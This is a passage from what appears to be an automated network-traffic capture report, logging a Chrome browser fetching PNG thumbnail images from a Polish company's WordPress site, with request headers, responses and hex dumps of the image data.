                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:23 GMT
                                                            ETag: "358e-620a8b506c440"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 13710
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 65 fa c7 7f 5b b3 d9 64 d3 49 80 24 84 10 6a 20 26 12 ba a0 87 a0 14 01 a9 c2 f9 07 cb 71 8a e2 89 8a 15 db 9d 05 11 f5 ce 82 67 6f a7 9e 0d 11 05 14 01 81 53 44 8a f4 90 50 a4 06 12 48 48 ef db ff ef 3b d9 4d 36 c9 26 bb 93 ec b2 b3 e1 f9 f2 19 76 32 33 fb ce b3 ef fc e6 37 cf fb 4e 53 5a ad 56 48 11 a5 af 03 68 0e 0a 4c 2c ed 23 b0 53 a7 4e 59 bb 76 ed da 96 f5 c9 dc 5d 50 4c 60 6d 0d 4a 28 03 6e 06 77 d1 37 e5 ce 9d 3b 77 0f 1a 34 28 dd d5 72 17 3d b0 f2 f2 f2 fe ee 2c d7 3e c4 7f 31 a1 c0 c4 e2 76 60 5b 8f 94 00 16 e0 8a 3e 61 28 ae 30 21 eb 4c 3e
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|e[dI$j &qgoSDPHH;M6&v237NSZVHhL,#SNYv]PL`mJ(nw7;w4(r=,>1v`[>a(0!L>
                                                            2025-01-15 10:08:08 UTC5775INData Raw: e5 ee 77 da ba 4c 5b d6 e3 32 5e ee 5c ec b0 c8 5b c5 fc 3d 76 92 ec e7 92 aa b0 14 3c b7 e2 ad 3e 5f 07 22 55 6c 57 7a f0 97 ea 94 fa 38 14 a7 48 55 58 2a 56 71 92 4e 4e a5 00 db f9 22 6c ae 25 39 a4 2a 2c fe 66 4a 72 2b 17 d8 fa f0 f8 e5 b5 92 6b 2d 4b 55 58 dc e7 49 58 ee c1 eb 8a 84 e5 26 92 4c 48 bd 84 b3 8e 53 b1 df 97 1c 52 15 16 e5 57 ee 43 c2 12 01 77 2c 67 a7 3b e0 64 bc b9 65 00 e7 a7 50 9c 9d 5e 69 ee 14 4f 73 a7 62 1a 7f cf 59 19 2d ad df 9d b2 1a c7 d1 78 ba fd 6f 12 96 08 2e a5 43 61 5b 21 61 89 c0 9e 8c 36 77 e2 d6 d9 5e ef cc 29 9c 9d 64 76 9c df f8 7b ce be df 5c af 7b 4b d3 1b af db 59 ec cd 9d 00 6f ce 9d 9b 8b 97 84 25 02 c7 73 60 ce 2a ce 55 65 ba aa 7c 31 df b7 3a 99 e6 ce f4 d6 fc ed ac 4c 49 0a c7 15 ed ee 7a 71 82 20 da 2f 52 3d
                                                            Data Ascii: wL[2^\[=v<>_"UlWz8HUX*VqNN"l%9*,fJr+k-KUXIX&LHSRWCw,g;deP^iOsbY-xo.Ca[!a6w^)dv{\{KYo%s`*Ue|1:LIzq /R=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            138192.168.2.1649201178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC660OUTGET /wp-content/uploads/2015/07/intermarche_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:22 GMT
                                                            ETag: "3e13-620a8b4f5dc38"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 15891
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 05 60 54 57 da 86 df 3b 16 17 62 c4 88 90 e2 c5 1d 0a 2d d2 52 a1 2d 52 da 52 77 77 d9 ba 6f 6d db fe 95 ad ec 6e 65 db 6e 5d 80 52 01 4a b1 1a 52 9c 06 87 10 21 24 21 09 c4 33 fe 7f e7 cc 4c 08 61 92 cc 84 19 e6 0e fd 9e 70 99 b9 76 ee 99 73 df fb 9e ef 9c 6b 3a bb dd 0e 35 a2 0b 74 06 5a 83 33 e6 2d c7 47 c6 f6 ec d9 63 cf ca ca 3a 9a ed 29 9e 2e e8 4d c6 8e 36 53 32 0d 78 98 b9 63 be 2b 57 ad 5a b5 66 d8 b0 61 83 db 5b ee 98 67 ac a6 a6 66 90 27 cb 1d 1f e2 3f 96 70 c6 bc c5 e3 8c 75 4e 48 96 9f c9 c9 9d 51 52 5a 0a 9b cd 86 e2 92 bd 48 e9 9c 8a 55 86 24 68
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx`TW;b-R-RRwwomnen]RJR!$!3Lapvsk:5tZ3-Gc:).M6S2xc+WZfa[gf'?puNHQRZHU$h
                                                            2025-01-15 10:08:08 UTC7956INData Raw: 00 0b ab 19 eb d6 af c1 89 bd fb a1 ac a2 14 ff a0 f8 c9 d8 d8 d0 34 4f 71 9e 96 91 67 68 68 87 bb fa d3 9a 4f 17 42 10 26 eb 30 da a6 2f d2 85 5c 67 75 14 8d d6 79 2a 4a 71 38 91 3c 2b d0 7c 5d 67 7a 0a 9c 67 17 14 e7 b8 e3 7b 46 97 74 3f 97 82 6f 60 61 35 23 25 35 15 15 07 cb e5 f7 82 bd ea 3e 65 a2 76 58 58 8c 5f 60 61 31 7e 81 85 c5 f8 05 16 16 e3 17 58 58 8c 5f 60 61 31 7e 81 85 c5 f8 05 16 16 e3 17 58 58 8c 5f 60 61 31 7e 81 85 c5 f8 05 16 16 e3 17 58 58 8c 5f 60 61 31 7e 81 85 c5 f8 05 16 16 e3 17 58 58 8c 5f 60 61 31 7e 41 95 c2 12 b7 ce 8b 41 eb ee d1 40 4c 13 fc 18 23 2f 69 68 68 a8 b7 db ed ea bf 8f 3c 80 88 db e3 c4 f3 2b e2 e2 e2 8c 81 ce 8b 3b 54 29 ac a8 a8 a8 f9 46 a3 71 9a bb 87 a5 31 0e 84 5b 15 14 14 20 25 25 a5 2c d0 79 71 87 2a f7 dc
                                                            Data Ascii: 4OqghhOB&0/\guy*Jq8<+|]gzg{Ft?o`a5#%5>evXX_`a1~XX_`a1~XX_`a1~XX_`a1~XX_`a1~AA@L#/ihh<+;T)Fq1[ %%,yq*


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            139192.168.2.1649203178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC658OUTGET /wp-content/uploads/2015/07/stokrotka_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:11 GMT
                                                            ETag: "5543-620a8b4488626"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 21827
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 9d 07 60 53 d5 f7 c7 bf d9 3b 69 d3 36 6d d2 96 b2 0b 65 6f 04 59 8a 28 e0 60 2b 38 70 b3 9c 3f fd ab b8 11 b7 3f 07 2e 70 fe 44 14 c5 2d 8a 0a 08 2a 08 08 8a cc b2 67 4b f7 6e 9a 34 3b ff 7b 5f da 74 b7 69 9b 34 49 b9 1f 8c 4d de bb ef be 93 9b f3 ce 3d 77 9d 2b 74 bb dd 08 45 84 c1 16 a0 21 98 60 cd a5 7d 08 76 e6 cc 19 77 c7 8e 1d 5b 73 3f 9e af 09 9b 23 58 6b 85 e2 f2 80 8f c2 b5 f9 4f b9 6b d7 ae dd 43 87 0e 1d d4 54 ba 66 09 e6 72 3b f0 cc 4f 17 b6 5c 2a c2 08 e9 33 03 7d 49 d7 2c c1 9a 16 8a fe 4a fe 31 d8 3e 0b b6 f8 9b 3e 90 4b 14 0d 9e e7 f3 04 78 64 d2
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx`S;i6meoY(`+8p??.pD-*gKn4;{_ti4IM=w+tE!`}vw[s?#XkOkCTfr;O\*3}I,J1>>Kxd
                                                            2025-01-15 10:08:09 UTC8000INData Raw: f8 55 6e 04 cf 5a f1 68 c4 6b 8b 1e b3 86 bc c0 7d 7e e8 d3 71 90 46 58 58 e3 a1 09 42 5a b1 7e 3b f6 0e 62 14 9a a0 76 27 58 9c 65 78 e8 aa ef bd 9f 1f 98 ba 0a af 6e 9e 04 31 4f 1e 34 99 c2 81 90 55 2c da eb be 69 f7 37 50 46 06 d7 32 e4 e7 d9 a1 92 55 cd 5e d5 ca 13 90 97 67 43 bc 8e 29 56 63 84 ac 62 51 cc c2 12 28 03 d4 bd c0 e3 09 b8 6d 1d 5c ee c6 67 f8 0a 6c 75 ef cf 2f 6f ba 75 ca 27 f9 d3 ea 32 90 d6 96 6e 94 19 aa 84 b4 62 a9 a5 81 29 b8 62 b3 09 63 93 af 41 61 79 26 76 ee f9 1d b1 09 72 4e 11 ea c2 83 4c a4 ac 73 54 22 68 d8 5a b9 dc 0e e4 a4 97 63 e4 c0 4b a0 10 47 e1 cf d3 5f 42 23 39 ff ac 5b 48 2b 96 80 1f 98 61 30 a7 51 86 2b fa 7a 96 ea cd 1d 06 ec 3e fd 2d de df f6 08 0c 91 74 88 a8 aa ea a5 16 4d 28 a8 3b c0 2b 10 50 8b e5 44 ed 2d 75
                                                            Data Ascii: UnZhk}~qFXXBZ~;bv'Xexn1O4U,i7PF2U^gC)VcbQ(m\glu/ou'2nb)bcAay&vrNLsT"hZcKG_B#9[H+a0Q+z>-tM(;+PD-u
                                                            2025-01-15 10:08:09 UTC5892INData Raw: 17 f8 36 01 67 14 14 6a 2d 54 11 91 88 56 aa a1 95 c6 40 2a 51 71 d1 15 4c e5 45 28 30 17 a0 a0 a4 04 26 63 11 ca cb 4a 89 d7 63 82 4b e0 00 4f ca 83 4c c9 87 4a 22 25 cd 39 31 22 b4 b4 53 bc e6 d2 19 ba d0 26 5a 55 88 67 fe 1d 81 2e ea 1c dc da f3 30 22 48 53 cf eb 6d 55 0c a8 16 d8 64 58 b1 af 37 ce 11 cf 8a 1a 2b 5e 35 77 4c 48 3c 2b 43 b4 84 f3 d2 0e 9c fb 19 fb ce 7d 07 a3 c5 82 b2 72 17 dc 26 37 f8 4e 11 24 02 05 91 45 0d 85 26 92 8b 58 1a a9 8e 86 42 ac e1 62 78 99 ac 46 94 5a f2 90 43 bf 43 49 31 4c 65 85 b0 38 cb e0 12 39 21 d5 f0 a1 95 c9 21 91 8a 10 2f d1 b4 20 de 17 23 d4 60 06 ab 5d 41 e7 3a 89 11 2d 23 de 95 77 c2 3a ed 6d 2a 26 de 46 09 b2 4a 40 5e 35 a7 65 d0 b3 56 18 51 26 e0 41 28 93 40 6a 55 c2 21 b4 c3 01 0b 14 22 21 69 c6 89 1a 7d d0
                                                            Data Ascii: 6gj-TV@*QqLE(0&cJcKOLJ"%91"S&ZUg.0"HSmUdX7+^5wLH<+C}r&7N$E&XBbxFZCCI1Le89!!/ #`]A:-#w:m*&FJ@^5eVQ&A(@jU!"!i}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            140192.168.2.1649204178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC654OUTGET /wp-content/uploads/2015/07/zabka_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:07 GMT
                                                            ETag: "849e-620a8b410ccd3"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 33950
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 7d 07 60 14 75 f6 ff 67 66 67 7b b2 9b 0e 49 08 49 08 a1 f7 5e 45 14 11 6c 20 58 b0 e0 9d 3f f5 ac 67 17 15 bb 9e 05 0b e7 d9 4e bc 3b bd 13 8e d3 53 50 b1 80 72 8a 1d 41 e9 bd 04 d2 09 21 75 37 db 77 67 fe ef 3b bb 21 6d 43 76 c3 2e d9 e5 bf 1f 1d b2 3b 3b f3 9d 37 6f 3e f3 be ef db de 13 24 49 42 24 42 e8 6a 01 da 43 4c b0 60 71 7a 08 56 58 58 28 e5 e4 e4 9c cc f5 b8 40 0f 0c 46 b0 76 85 7a eb 03 23 fe 30 d8 ec 2d 4d 23 61 27 7f 08 83 32 72 fd 96 11 a8 70 27 fd 28 a5 02 1e 7f 18 de cc e4 d8 81 41 e8 05 94 aa 81 1e f6 36 c7 6f dc b8 71 d3 98 31 63 46 86 4d 30 66
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx}`ugfg{II^El X?gN;SPrA!u7wg;!mCv.;;7o>$IB$BjCL`qzVXX(@Fvz#0-M#a'2rp'(A6oq1cFM0f
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 59 7f 10 44 37 16 bf 73 35 11 ab 2c 28 5d 44 12 a2 9a 58 ef 6e fa 11 cb 6e a6 2a cc d1 ca 02 90 75 ea a6 b7 63 d2 11 2b 4a b3 d5 70 9a da 5a 08 a7 83 43 8d 96 87 b1 3b b3 4a 4d 0d 85 a4 24 27 b6 ff 4f 87 1e c3 9d 2d 48 25 e7 14 d9 c8 21 67 92 08 b7 b3 89 85 86 04 f2 8b 56 aa 90 3d ce 05 7b 1c b0 f8 08 b5 12 c9 ff ca e5 5d d0 2b 9c a8 31 f1 ac 25 02 8f 1c bf d6 6b c2 06 5e e6 40 d6 c2 74 94 3c 51 ec 3f 37 b3 83 c7 07 b7 d5 c2 64 33 c1 a0 35 9c 94 8e ba 0a 11 4b ac 40 5a 85 8f be 71 1d ae 79 bc 9d 30 6c e4 e6 7c 70 fd 51 40 ad c0 d4 e7 73 50 34 82 43 b2 ca 8e e6 c5 8a 9c 08 73 95 07 f1 49 de ef 29 49 2a 6c ff c9 8d 1e 23 da 3e 6d a5 46 82 cb a9 24 52 79 d3 26 b1 19 57 c7 ca 38 a4 24 2a d0 e7 2c af 4f 65 b7 91 65 12 95 28 5e 0f 8c bc d0 8e da 1a 85 9c 85 b8
                                                            Data Ascii: YD7s5,(]DXnn*uc+JpZC;JM$'O-H%!gV={]+1%k^@t<Q?7d35K@Zqy0l|pQ@sP4CsI)I*l#>mF$Ry&W8$*,Oee(^
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 7c 59 35 06 ec ab 23 29 9b 2d e2 a0 df d3 f4 40 71 6d 65 8c 58 a7 0a d5 75 25 3e 8b c4 20 1d ff a3 51 10 79 74 36 58 cd 0e 4c ac ad 3f 7e fc b6 19 d3 a1 d8 b3 1b a2 83 c7 e5 0b b5 c8 4f aa c5 0f eb 35 98 fe 83 0a 96 fb 38 b9 13 75 db f7 4a 8c 9e e5 c4 d3 e7 92 d3 fc 57 11 db be a9 94 cf fd fa 92 04 f4 f8 7b 1c 7e dd 52 83 78 b2 40 79 65 71 c8 2e 14 b1 66 87 13 ae d7 bb 63 cb 3f 16 23 6f c1 99 f2 b1 9b 93 8d 30 ca 3d e5 12 74 6c 73 2b 7c b6 89 27 92 49 90 94 1c 29 9c 85 e6 76 83 b7 d9 c1 3f fe 18 92 a1 46 c3 bf 3e a4 7d df b4 b9 4f a3 da 83 df 8e 94 63 70 66 f4 e5 c0 8e 4a 62 b9 3d 55 7e 62 a9 fb 28 c6 1c 72 ae e5 3e 81 55 93 0a 05 8b 80 85 b5 4f b3 a8 c6 3c 32 ac 4e b2 58 12 06 56 26 d3 43 75 62 f7 72 0b 36 7f c1 63 e1 40 a7 4c 04 f9 5c 22 af f8 61 1d 0e
                                                            Data Ascii: |Y5#)-@qmeXu%> Qyt6XL?~O58uJW{~Rx@yeq.fc?#o0=tls+|'I)v?F>}OcpfJb=U~b(r>UO<2NXV&Cubr6c@L\"a
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 62 ee 7b 58 b6 ed 5b 4c 28 1f d1 ad 87 70 03 47 53 87 4b 58 29 a2 27 c8 aa 26 d0 84 f9 8b 6e c7 bb d7 db 2b 29 40 b0 7a e7 51 ce 7c 48 bc d7 42 65 80 c8 ea de 81 f0 1f 17 c4 80 02 0b bb f6 f8 d1 ff b0 06 0c 1d 9d 8d e5 6f 09 90 f3 80 91 df b3 10 68 56 61 1a a9 cf b8 16 64 11 5b 96 f1 38 6c 9a bd ae 0f 14 2d 8c 3d 0d 89 54 c5 4e c8 7a 38 22 c0 2b c6 30 ed 22 05 e7 bf 9c 87 73 96 19 78 ea ca 06 36 47 a8 cf 16 f7 e1 22 16 b2 d2 0d cc 19 13 c2 cf fe fa 1b 7c 71 df 4b dd 7a 57 5c c2 4a 1d 2e 61 f5 11 4c 22 26 9e 8d ed d3 1d b8 f9 ef 4f 62 6c e1 36 8c c8 d7 ed 98 ab 1e 18 af 6f 07 3c 29 1f 13 1a 29 9e d3 1e 2e 04 5f 01 1c 56 02 34 d6 39 39 d1 15 45 a6 57 14 23 4e 8c 41 10 32 f1 f5 5b 61 f8 fb e5 a0 62 7c 00 a1 90 93 bd 38 59 68 51 0b 05 c3 0c a8 f6 3e ed 77 52
                                                            Data Ascii: b{X[L(pGSKX)'&n+)@zQ|HBeohVad[8l-=TNz8"+0"sx6G"|qKzW\J.aL"&Obl6o<))._V499EW#NA2[ab|8YhQ>wR
                                                            2025-01-15 10:08:09 UTC2015INData Raw: e9 d5 57 5f 7d 82 3a c8 a8 91 23 47 c2 e7 f3 75 4d 5a 3d 8c d6 b3 df fc fd 07 a2 fc e6 9b 30 e8 96 5f d8 9f 35 e8 d0 b6 6d 43 e5 a7 1f 41 7d e2 59 34 6e d9 84 9c 50 18 69 cc c9 4d f5 f6 88 1e 32 29 e3 29 0d 5a f9 94 0e 49 30 9f 11 0b b7 60 83 1e 44 4c 31 c3 84 6a e8 08 7b bc c8 a2 f3 b6 66 1e 8f f2 8b 7e 44 4a 6a 38 dd 13 61 bf 35 99 b9 56 ff f6 36 12 64 c5 fc 56 8c ac 36 6f de bc 66 d6 ac 59 37 b1 36 d5 27 15 fa 8e c2 25 ac d4 a0 a5 a5 a5 ad 38 fb ec b3 2f 79 fd f5 d7 7f 4f 4f ca e9 4c 69 65 64 64 30 32 b3 cd c4 43 01 ad c9 93 4d 3c 91 ca 07 63 48 59 05 b8 8b ae d8 bb 91 69 21 52 5d 8d e6 f5 6b 61 3d ff 22 36 ad 5b 8b 82 9d 95 d0 43 01 88 a4 50 3c 6c 0a 20 95 a3 53 c7 17 78 11 16 9b 48 1c 2f d6 99 83 1d 27 b6 7d df bb ae dc 7e ef 89 68 74 db e6 25 6b 57
                                                            Data Ascii: W_}:#GuMZ=0_5mCA}Y4nPiM2))ZI0`DL1j{f~DJj8a5V6dV6ofY76'%8/yOOLiedd02CM<cHYi!R]ka="6[CP<l SxH/'}~ht%kW


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            141192.168.2.1649205178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC411OUTGET /wp-content/uploads/2015/07/mm_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:10 GMT
                                                            ETag: "3818-620a8b43b7678"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14360
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 78 15 55 fa c6 df 54 48 0f 2d 74 02 84 8e 48 09 08 a2 20 88 ae 82 ba 54 0b 56 5c 2b fa 57 d7 de 75 bb ba ba ab ae ae ae ba 2a 76 d6 2e 56 44 41 c5 02 28 bd 28 28 25 a1 43 08 90 90 de fe ef 77 cf bd e4 12 6e 92 3b 61 2e 77 06 bf df f3 4c ee 64 e6 cc 99 6f ce 7c e7 3d df 39 d3 a2 ab aa aa e0 44 a2 c3 6d 40 6d a8 61 56 39 32 0c db b0 61 43 55 c7 8e 1d 0f 65 7f 11 c1 26 b4 62 d8 a1 1a e5 c9 03 41 1a 77 d8 4f e5 82 05 0b 16 1e 73 cc 31 99 f5 a5 3b ec 86 e5 e7 e7 0f 08 26 dd 91 e1 fc 87 13 35 cc 2a 41 1b 56 51 55 61 66 22 b9 c9 a6 4d 40 9b 56 e6 ff c5 cb 80 fe 47
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxxUTH-tH TV\+Wu*v.VDA(((%Cwn;a.wLdo|=9Dm@maV92aCUe&bAwOs1;&5*AVQUaf"M@VG
                                                            2025-01-15 10:08:09 UTC6425INData Raw: 5b f9 70 93 63 25 b2 57 94 c1 42 ef cc 82 8e 90 71 2d 9e 84 d2 23 2d 70 f7 21 ce c5 a9 75 59 59 59 6b 1e 77 51 5c 5c dc 72 6f d3 e8 0a 15 73 83 63 49 15 6e c6 c2 cd 64 0f 30 9a 85 5b ea 5d 5e db 8b 3c 03 45 f2 11 38 f0 e5 a2 55 7e cb 10 60 1e 38 f8 65 a4 f5 ed af b6 bc 03 ed 3f d0 b6 fe db 89 ba 7a 7a bb 72 ad 94 c7 1d 51 5e 5e 7e 34 55 2c 99 f3 bf 70 7d 29 1c 8e e3 1d 8b 4e d5 82 b5 b6 0f 9b 04 89 3b 5c 51 5b ed 46 1c 8c b1 a4 5c 7c 6e c3 30 20 8e ce b6 8c 8b cb c2 6d 57 5d 38 dd b1 92 58 4b bb b1 96 3a be 86 1e 0e e4 92 16 cb 22 9e ea d5 89 e1 80 28 97 63 6f 21 75 b2 63 45 b3 00 bb b2 00 eb 73 aa 9a cd 8e 15 ea da 36 50 d3 16 28 bd 7f ba ba f2 6d 88 9d 07 e5 2d 6d 24 1d 2c 95 4a de 44 ae a7 5a cc ef b0 e1 58 c7 62 c1 a5 d0 a9 a4 e9 6b 68 f3 17 28 ae 0a
                                                            Data Ascii: [pc%WBq-#-p!uYYYkwQ\\roscInd0[]^<E8U~`8e?zzrQ^^~4U,p})N;\Q[F\|n0 mW]8XK:"(co!ucEs6P(m-m$,JDZXbkh(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            142192.168.2.1649206178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:08 UTC415OUTGET /wp-content/uploads/2015/07/saturn_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:08 GMT
                                                            ETag: "3503-620a8b41ef5c0"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 13571
                                                            Content-Type: image/png
